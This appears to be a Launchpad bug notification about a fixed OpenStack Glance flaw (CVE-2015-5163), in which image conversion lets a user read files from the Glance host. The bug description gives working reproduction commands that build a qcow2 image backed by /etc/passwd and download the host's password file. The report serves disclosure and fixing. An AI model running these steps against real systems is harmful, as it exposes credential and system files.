| Thread Previous • Date Previous • Date Next • Thread Next |
** Also affects: glance/kilo
Importance: Undecided
Status: New
** Changed in: glance/kilo
Status: New => Fix Committed
** Changed in: glance/kilo
Milestone: None => 2015.1.3
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1471912
Title:
[OSSA 2015-014] Format-guessing and file disclosure via image
conversion (CVE-2015-5163)
Status in Glance:
Fix Released
Status in Glance kilo series:
Fix Committed
Status in OpenStack Security Advisory:
Fix Released
Bug description:
This is a security flaw that allows files from the Glance host to be
obtained by a user.
I'm using the Glance file store and have set in /etc/glance/glance-api.conf:
[taskflow_executor]
engine_mode=serial # not sure if needed
conversion_format=raw
Make a malicious image available via HTTP.
$ sudo qemu-img create -f qcow2 /var/www/html/test_image 1M
$ sudo qemu-img rebase -u -b /etc/passwd /var/www/html/test_image
$ glance --os-image-api-version 2 task-create --type import --input '{"import_from_format": "qcow2", "import_from": "http://127.0.0.1/test_image";, "image_properties": {"name": "my_image_test", "disk_format": "qcow2", "container_format": "bare"}}'
$ glance image-download my_image_test --file downloaded_image
$ head downloaded_image
<contents from /etc/passwd on the Glance host>
This happens because Glance runs this command which doesn't specify a format, and uses qemu-img's format auto-detection:
qemu-img convert -O raw file:///tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4 /tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4.converted
Similar to Cinder bug 1415087.
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1471912/+subscriptions
| Thread Previous • Date Previous • Date Next • Thread Next |
